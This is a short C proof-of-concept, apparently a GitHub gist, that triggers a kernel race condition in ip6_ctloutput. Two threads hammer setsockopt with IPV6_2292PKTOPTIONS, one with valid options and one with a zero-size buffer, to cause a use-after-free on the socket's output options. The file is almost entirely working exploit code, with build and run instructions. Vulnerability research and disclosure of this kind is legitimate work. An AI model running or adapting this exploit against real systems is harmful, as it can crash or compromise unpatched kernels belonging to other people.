/* | |
* Race condition in ip6_ctloutput where in6p is not locked when calling | |
* ip6_pcbopts, which allows for a use after free on in6p->in6p_outputopts | |
* | |
* Build: gcc -std=c99 -o poc poc.c -lpthread | |
* Run: ./poc | |
* | |
* Discovered by TJ Corley 8/15/2018 | |
*/ | |
#include <netinet/in.h> | |
#include <pthread.h> | |
#include <stdio.h> | |
#include <sys/socket.h> | |
#include <sys/types.h> | |
#define IPV6_2292PKTOPTIONS 25 | |
int s; | |
static void spam_valid() { | |
char ctrl[CMSG_SPACE(sizeof(int))]; | |
struct cmsghdr *cmsg = (struct cmsghdr *)&ctrl; | |
cmsg->cmsg_len = CMSG_LEN(4); | |
cmsg->cmsg_level = IPPROTO_IPV6; | |
cmsg->cmsg_type = IPV6_TCLASS; | |
char *data = (char *)CMSG_DATA(cmsg); | |
*(int *)data = 0x4; | |
printf("spamming valid IPV6_2292PKTOPTIONS\n"); | |
for (;;) { | |
setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, cmsg, CMSG_LEN(4)); | |
} | |
} | |
static void spam_zero_size_mbuf() { | |
char *buf[0x4] = {}; | |
printf("spamming zero size mbuf\n"); | |
for (;;) { | |
setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, buf, 0); | |
} | |
} | |
int main() { | |
pthread_t t; | |
s = socket(AF_INET6, SOCK_DGRAM, 0); | |
pthread_create(&t, NULL, (void *)spam_valid, NULL); | |
spam_zero_size_mbuf(); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment